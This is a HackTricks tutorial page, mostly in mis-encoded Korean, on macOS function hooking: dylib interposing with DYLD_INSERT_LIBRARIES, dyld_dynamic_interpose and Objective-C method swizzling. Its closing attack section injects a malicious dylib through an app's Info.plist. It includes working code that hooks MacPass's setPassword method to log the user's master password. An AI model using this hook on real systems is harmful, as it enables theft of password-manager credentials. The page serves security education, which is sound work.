HackTricks
macOS Function Hooking
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.
Function Interposing
__interpose (__DATA___interpose) μΉμ
μ΄ μλ dylibλ₯Ό μμ±ν©λλ€ (λλ S_INTERPOSING νλκ·Έκ° μλ μΉμ
). μ΄ μΉμ
μλ μλ³Έ ν¨μμ λ체 ν¨μλ₯Ό μ°Έμ‘°νλ ν¨μ ν¬μΈν°μ ννμ΄ ν¬ν¨λμ΄μΌ ν©λλ€.
κ·Έλ° λ€μ, **DYLD_INSERT_LIBRARIES**λ₯Ό μ¬μ©νμ¬ dylibλ₯Ό μ£Όμ
ν©λλ€ (μΈν°ν¬μ§μ λ©μΈ μ±μ΄ λ‘λλκΈ° μ μ λ°μν΄μΌ ν©λλ€). λͺ
λ°±ν DYLD_INSERT_LIBRARIES μ¬μ©μ μ μ©λλ μ ν μ¬νμ΄ μ¬κΈ°μλ μ μ©λ©λλ€.
Interpose printf
// gcc -dynamiclib interpose.c -o interpose.dylib
#include <stdio.h>
#include <stdarg.h>
int my_printf(const char *format, ...) {
//va_list args;
//va_start(args, format);
//int ret = vprintf(format, args);
//va_end(args);
int ret = printf("Hello from interpose\n");
return ret;
}
__attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf
__attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf };
DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello Hello from interpose
> [!WARNING]
> **`DYLD_PRINT_INTERPOSTING`** νκ²½ λ³μλ₯Ό μ¬μ©νμ¬ μΈν°ν¬μ§μ λλ²κ·Έν μ μμΌλ©°, μΈν°ν¬μ¦ νλ‘μΈμ€λ₯Ό μΆλ ₯ν©λλ€.
λν **μΈν°ν¬μ§μ νλ‘μΈμ€μ λ‘λλ λΌμ΄λΈλ¬λ¦¬ μ¬μ΄μμ λ°μνλ©°**, 곡μ λΌμ΄λΈλ¬λ¦¬ μΊμμλ μλνμ§ μμ΅λλ€.
### λμ μΈν°ν¬μ§
μ΄μ **`dyld_dynamic_interpose`** ν¨μλ₯Ό μ¬μ©νμ¬ λμ μΌλ‘ ν¨μλ₯Ό μΈν°ν¬μ¦ν μ μμ΅λλ€. μ΄λ₯Ό ν΅ν΄ μμν λλ§ νλ κ²μ΄ μλλΌ λ°νμμ νλ‘κ·Έλ¨μ μΌλ‘ ν¨μλ₯Ό μΈν°ν¬μ¦ν μ μμ΅λλ€.
**λ체ν ν¨μμ λ체 ν¨μμ νν**μ μ§μ νκΈ°λ§ νλ©΄ λ©λλ€.
```c
struct dyld_interpose_tuple {
const void* replacement;
const void* replacee;
};
extern void dyld_dynamic_interpose(const struct mach_header* mh,
const struct dyld_interpose_tuple array[], size_t count);
Method Swizzling
In ObjectiveC this is how a method is called like: [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]
νμν κ²μ κ°μ²΄, λ©μλ λ° λ§€κ°λ³μμ
λλ€. λ©μλκ° νΈμΆλ λ msgκ° μ μ‘λλ©°, ν¨μ **objc_msgSend**λ₯Ό μ¬μ©ν©λλ€: int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);
κ°μ²΄λ someObject, λ©μλλ **@selector(method1p1:p2:)**μ΄λ©°, μΈμλ value1, value2μ
λλ€.
κ°μ²΄ ꡬ쑰λ₯Ό λ°λΌκ°λ©΄ λ©μλ λ°°μ΄μ μ κ·Όν μ μμΌλ©°, μ¬κΈ°μλ μ΄λ¦κ³Ό λ©μλ μ½λμ λν ν¬μΈν°κ° μμΉν©λλ€.
Caution
λ©μλμ ν΄λμ€κ° μ΄λ¦μ κΈ°λ°μΌλ‘ μ κ·ΌλκΈ° λλ¬Έμ μ΄ μ 보λ λ°μ΄λ리μ μ μ₯λ©λλ€. λ°λΌμ
otool -ov </path/bin>λλclass-dump </path/bin>λ‘ μ΄λ₯Ό κ²μν μ μμ΅λλ€.
Accessing the raw methods
λ©μλμ μ΄λ¦, 맀κ°λ³μ μ λλ μ£Όμμ κ°μ μ 보λ₯Ό λ€μ μμ μ κ°μ΄ μ κ·Όν μ μμ΅λλ€:
// gcc -framework Foundation test.m -o test
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
int main() {
// Get class of the variable
NSString* str = @"This is an example";
Class strClass = [str class];
NSLog(@"str's Class name: %s", class_getName(strClass));
// Get parent class of a class
Class strSuper = class_getSuperclass(strClass);
NSLog(@"Superclass name: %@",NSStringFromClass(strSuper));
// Get information about a method
SEL sel = @selector(length);
NSLog(@"Selector name: %@", NSStringFromSelector(sel));
Method m = class_getInstanceMethod(strClass,sel);
NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m));
NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m));
// Iterate through the class hierarchy
NSLog(@"Listing methods:");
Class currentClass = strClass;
while (currentClass != NULL) {
unsigned int inheritedMethodCount = 0;
Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount);
NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount);
for (unsigned int i = 0; i < inheritedMethodCount; i++) {
Method method = inheritedMethods[i];
SEL selector = method_getName(method);
const char* methodName = sel_getName(selector);
unsigned long address = (unsigned long)method_getImplementation(m);
NSLog(@"Inherited method name: %s (0x%lx)", methodName, address);
}
// Free the memory allocated by class_copyMethodList
free(inheritedMethods);
currentClass = class_getSuperclass(currentClass);
}
// Other ways to call uppercaseString method
if([str respondsToSelector:@selector(uppercaseString)]) {
NSString *uppercaseString = [str performSelector:@selector(uppercaseString)];
NSLog(@"Uppercase string: %@", uppercaseString);
}
// Using objc_msgSend directly
NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));
NSLog(@"Uppercase string: %@", uppercaseString2);
// Calling the address directly
IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address
NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp
NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method
NSLog(@"Uppercase string: %@", uppercaseString3);
return 0;
}
Method Swizzling with method_exchangeImplementations
ν¨μ **method_exchangeImplementations**λ νλμ ν¨μμ ꡬν μ£Όμλ₯Ό λ€λ₯Έ ν¨μλ‘ λ³κ²½ν μ μκ² ν΄μ€λλ€.
Caution
λ°λΌμ ν¨μκ° νΈμΆλ λ μ€νλλ κ²μ λ€λ₯Έ ν¨μμ λλ€.
//gcc -framework Foundation swizzle_str.m -o swizzle_str
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
// Create a new category for NSString with the method to execute
@interface NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original method
return [self swizzledSubstringFromIndex:from];
}
@end
int main(int argc, const char * argv[]) {
// Perform method swizzling
Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));
Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));
method_exchangeImplementations(originalMethod, swizzledMethod);
// We changed the address of one method for the other
// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex
// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
return 0;
}
Warning
μ΄ κ²½μ° μ μμ μΈ λ©μλμ ꡬν μ½λκ° λ©μλ μ΄λ¦μ κ²μ¦νλ©΄ μ΄ μ€μμ¦λ§μ κ°μ§νκ³ μ€νμ λ°©μ§ν μ μμ΅λλ€.
λ€μ κΈ°μ μ μ΄λ¬ν μ νμ΄ μμ΅λλ€.
method_setImplementationμ μ΄μ©ν λ©μλ μ€μμ¦λ§
μ΄μ νμμ μλ‘ λ€λ₯Έ λ λ©μλμ ꡬνμ λ³κ²½νκΈ° λλ¬Έμ μ΄μν©λλ€. method_setImplementation ν¨μλ₯Ό μ¬μ©νλ©΄ νλμ λ©μλμ ꡬνμ λ€λ₯Έ λ©μλλ‘ λ³κ²½ν μ μμ΅λλ€.
μλ‘μ΄ κ΅¬νμμ νΈμΆνκΈ° μ μ μλ ꡬνμ μ£Όμλ₯Ό μ μ₯νλ κ²μ μμ§ λ§μΈμ. λμ€μ κ·Έ μ£Όμλ₯Ό μ°Ύλ κ²μ΄ ν¨μ¬ 볡μ‘ν΄μ§ κ²μ λλ€.
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
static IMP original_substringFromIndex = NULL;
@interface NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original implementation using objc_msgSendSuper
return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);
}
@end
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Get the class of the target method
Class stringClass = [NSString class];
// Get the swizzled and original methods
Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:));
// Get the function pointer to the swizzled method's implementation
IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:)));
// Swap the implementations
// It return the now overwritten implementation of the original method to store it
original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP);
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
// Set the original implementation back
method_setImplementation(originalMethod, original_substringFromIndex);
return 0;
}
}
Hooking Attack Methodology
μ΄ νμ΄μ§μμλ ν¨μλ₯Ό ννΉνλ λ€μν λ°©λ²μ λν΄ λ Όμνμ΅λλ€. κ·Έλ¬λ μ΄ λ°©λ²λ€μ 곡격μ μν΄ νλ‘μΈμ€ λ΄μμ μ½λλ₯Ό μ€ννλ κ²μ ν¬ν¨ν©λλ€.
μ΄λ₯Ό μν΄ κ°μ₯ μ¬μ΄ κΈ°μ μ νκ²½ λ³μλ₯Ό ν΅ν Dyld μ£Όμ λλ νμ΄μ¬νΉμ λλ€. κ·Έλ¬λ μ΄κ²μ Dylib νλ‘μΈμ€ μ£Όμ μ ν΅ν΄μλ μνλ μ μλ€κ³ μκ°ν©λλ€.
κ·Έλ¬λ λ μ΅μ λͺ¨λ 보νΈλμ§ μμ λ°μ΄λ리/νλ‘μΈμ€μ μ νμ μ λλ€. κ° κΈ°μ μ νμΈνμ¬ μ ν μ¬νμ λν΄ λ μμ보μΈμ.
κ·Έλ¬λ ν¨μ ννΉ κ³΅κ²©μ λ§€μ° κ΅¬μ²΄μ μ΄λ©°, 곡격μλ νλ‘μΈμ€ λ΄λΆμμ λ―Όκ°ν μ 보λ₯Ό νμΉκΈ° μν΄ μ΄λ₯Ό μνν©λλ€(κ·Έλ μ§ μμΌλ©΄ λ¨μν νλ‘μΈμ€ μ£Όμ 곡격μ ν κ²μ λλ€). μ΄ λ―Όκ°ν μ 보λ MacPassμ κ°μ μ¬μ©μ λ€μ΄λ‘λ μ±μ μμΉν μ μμ΅λλ€.
λ°λΌμ 곡격μμ 벑ν°λ μ·¨μ½μ μ μ°Ύκ±°λ μ ν리μΌμ΄μ
μ μλͺ
μ μ κ±°νκ³ , μ ν리μΌμ΄μ
μ Info.plistλ₯Ό ν΅ν΄ DYLD_INSERT_LIBRARIES νκ²½ λ³μλ₯Ό μ£Όμ
νμ¬ λ€μκ³Ό κ°μ λ΄μ©μ μΆκ°νλ κ²μ
λλ€:
<key>LSEnvironment</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Applications/Application.app/Contents/malicious.dylib</string>
</dict>
κ·Έλ¦¬κ³ μ¬λ±λ‘ μ ν리μΌμ΄μ :
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app
ν΄λΉ λΌμ΄λΈλ¬λ¦¬μ μ 보λ₯Ό μ μΆνλ ννΉ μ½λλ₯Ό μΆκ°νμΈμ: λΉλ°λ²νΈ, λ©μμ§β¦
Caution
μ΅μ λ²μ μ macOSμμλ μ ν리μΌμ΄μ λ°μ΄λ리μ μλͺ μ μ κ±°νκ³ μ΄μ μ μ€νλ κ²½μ°, macOSλ λ μ΄μ μ ν리μΌμ΄μ μ μ€ννμ§ μμ΅λλ€.
Library example
// gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib
// If you added env vars in the Info.plist don't forget to call lsregister as explained before
// Listen to the logs with something like:
// log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"'
#include <Foundation/Foundation.h>
#import <objc/runtime.h>
// Here will be stored the real method (setPassword in this case) address
static IMP real_setPassword = NULL;
static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)
{
// Function that will log the password and call the original setPassword(pass, file_path) method
NSLog(@"[+] Password is: %@", password);
// After logging the password call the original method so nothing breaks.
return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);
}
// Library constructor to execute
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
// Get the real method address to not lose it
Class classMPDocument = NSClassFromString(@"MPDocument");
Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:));
// Make the original method setPassword call the fake implementation one
IMP fake_IMP = (IMP)custom_setPassword;
real_setPassword = method_setImplementation(real_Method, fake_IMP);
}
References
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.